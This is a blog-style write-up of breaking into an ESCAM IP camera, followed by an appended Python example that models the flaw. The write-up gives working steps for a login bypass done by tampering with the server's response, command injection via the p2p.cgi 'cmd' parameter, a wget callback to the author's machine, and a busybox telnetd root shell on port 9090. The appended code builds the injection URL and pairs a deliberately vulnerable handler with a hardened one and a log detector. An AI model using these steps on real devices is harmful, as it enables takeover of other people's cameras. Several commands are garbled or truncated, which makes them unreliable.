My father recently got an ESCAM IP camera that he bought on eBay. Having heard bad things about the security of these cameras before, I wanted to have a look at this one for myself.

It didn't take long before I found the first vulnerability.

Without more than the Firefox developer tools, I got a hint when the response for a failed login attempt was just:

```
var check = "0"
```

Could it really be as simple as changing the response, and setting the authLevel client side?

I didn't do any more digging into the (horribly messy) JavaScript files, and fired up Burp Suite's proxy instead. After turning on intercepting requests and responses, I tried to log in again, and changed check to "1" and authLevel to "255" (which was what I observed would happen after a valid login).

After getting access to the admin panel, I started looking for more weaknesses. Before long, I noticed a CGI script called "p2p.cgi" that was called with a GET parameter "cmd". I replaced the existing "cmd" value with a subshell (%24 is $ URL-encoded, so it's really $(ls)):

```
/cgi-bin/p2p.cgi?cmd=%24(ls)&-action=get
```

Next, I started a web server on my computer:

```
python -m rver
```

Then I went back to the admin panel of the IP camera, and replaced the "cmd" with this (not URL-encoded here for clarity):

```
$(wget 
```

And then, I watched my Python server receive an incoming request:

```
"GET / HTTP/1.1" 200 -
```

From there, I started running other commands to explore the file system and the specs of the computer inside. After some poking around, I found out that I could just spawn busybox and connect to it with telnet, to gain full access to the system as root. Injecting the following:

```
/bin/busybox telnetd -l/bin/sh -p 9090
```

I could simply run `telnet 9090`, and BOOM! I was in.

Here's some information about the system that you might find interesting:

```
# cat /proc/version
Linux version 3.0.8 (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #2 Thu Sep 18 00:48:

Features : swp half thumb fastmult edsp java

Filesystem Size Used Available Use% Mounted on
```

This hack was carried out so that I could verify that the camera didn't connect to services outside our network without us knowing. I hope you found this post interesting, but remember: don't break into systems you don't own or have permission to hack on!
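The `p2p.cgi` command injection above is a textbook case of user input reaching a shell, so it is worth seeing the primitive, its fix and a detection check side by side. The Python below is an added example, not code from the original post or from the camera: it reproduces the URL shape the post shows (`%24(ls)`), models the weak CGI with a deliberately vulnerable `sh -c` handler next to an allowlisted no-shell version, and runs a detector over constructed access-log lines. The host `192.0.2.10`, the allowlist, the log lines and all function names are assumptions made for illustration; the page does not show how the real CGI executes `cmd`.

```python
# Added example, not code from the original post: a Python model of the
# p2p.cgi "cmd" command injection, plus a detection check over log lines.
# Assumptions (not on the page): the camera's CGI hands the cmd value to a
# shell (modelled here with `sh -c`); the host 192.0.2.10, the allowlist
# and the log lines are constructed for illustration.
import subprocess
from urllib.parse import quote, urlparse, parse_qs

CAMERA_HOST = "192.0.2.10"  # placeholder address, not the author's camera


def build_injection_url(host: str, payload: str) -> str:
    """Build the request the post shows: the $ is percent-encoded as %24 and
    the parentheses stay literal, so $(ls) is sent as %24(ls)."""
    cmd = quote(f"$({payload})", safe="()/")
    return f"http://{host}/cgi-bin/p2p.cgi?cmd={cmd}&-action=get"


def vulnerable_handler(cmd: str) -> str:
    """Deliberately weak model of the CGI: the attacker-controlled value is
    spliced into a shell command line, so the shell expands $(...) first."""
    line = f"echo requested {cmd}"
    out = subprocess.run(["sh", "-c", line], capture_output=True, text=True)
    return out.stdout.strip()


ALLOWED_CMDS = {"status", "version"}  # constructed allowlist


def hardened_handler(cmd: str) -> str:
    """Fixed model: match the value against an allowlist and pass it as one
    argv element, so no shell ever sees it and $(...) is never expanded."""
    if cmd not in ALLOWED_CMDS:
        raise ValueError(f"rejected cmd={cmd!r}")
    out = subprocess.run(["echo", "requested", cmd],
                         capture_output=True, text=True)
    return out.stdout.strip()


def hardened_rejects(cmd: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        hardened_handler(cmd)
    except ValueError:
        return True
    return False


SHELL_META = ("$(", "`", ";", "|", "&&", "\n")


def flag_injection(request_line: str) -> bool:
    """Detection over a common-log-format line: decode the cmd parameter of
    the request and flag shell metacharacters that allow command
    substitution ($(...), backticks) or command chaining."""
    request = request_line.split('"')[1]          # 'GET /path HTTP/1.1'
    path = request.split(" ")[1]
    params = parse_qs(urlparse(path).query)       # parse_qs percent-decodes
    cmd = params.get("cmd", [""])[0]
    return any(tok in cmd for tok in SHELL_META)


# Constructed log lines in the shape of the request the post shows.
SAMPLE_LOG = [
    '192.0.2.55 - - [01/Jan/2015:12:00:00 +0000] '
    '"GET /cgi-bin/p2p.cgi?cmd=status&-action=get HTTP/1.1" 200 -',
    '192.0.2.55 - - [01/Jan/2015:12:00:05 +0000] '
    '"GET /cgi-bin/p2p.cgi?cmd=%24(ls)&-action=get HTTP/1.1" 200 -',
    '192.0.2.55 - - [01/Jan/2015:12:00:09 +0000] '
    '"GET /cgi-bin/p2p.cgi?cmd=%24(/bin/busybox%20telnetd%20-l/bin/sh%20-p%209090)'
    '&-action=get HTTP/1.1" 200 -',
]


def suspicious_requests(log_lines):
    """Return the log lines whose cmd parameter carries shell metacharacters."""
    return [line for line in log_lines if flag_injection(line)]


if __name__ == "__main__":
    print(build_injection_url(CAMERA_HOST, "ls"))
    print(vulnerable_handler("$(echo INJECTED)"))
    print("hardened rejects payload:", hardened_rejects("$(echo INJECTED)"))
    for line in suspicious_requests(SAMPLE_LOG):
        print("ALERT", line)
```

The point of the two handlers is that the fix is not escaping: the hardened version never builds a command string at all, so there is nothing for `$(...)` to expand in. The detector only decodes one level of percent-encoding, which is what a web server's CGI layer does; a camera that decoded twice would need the check extended accordingly.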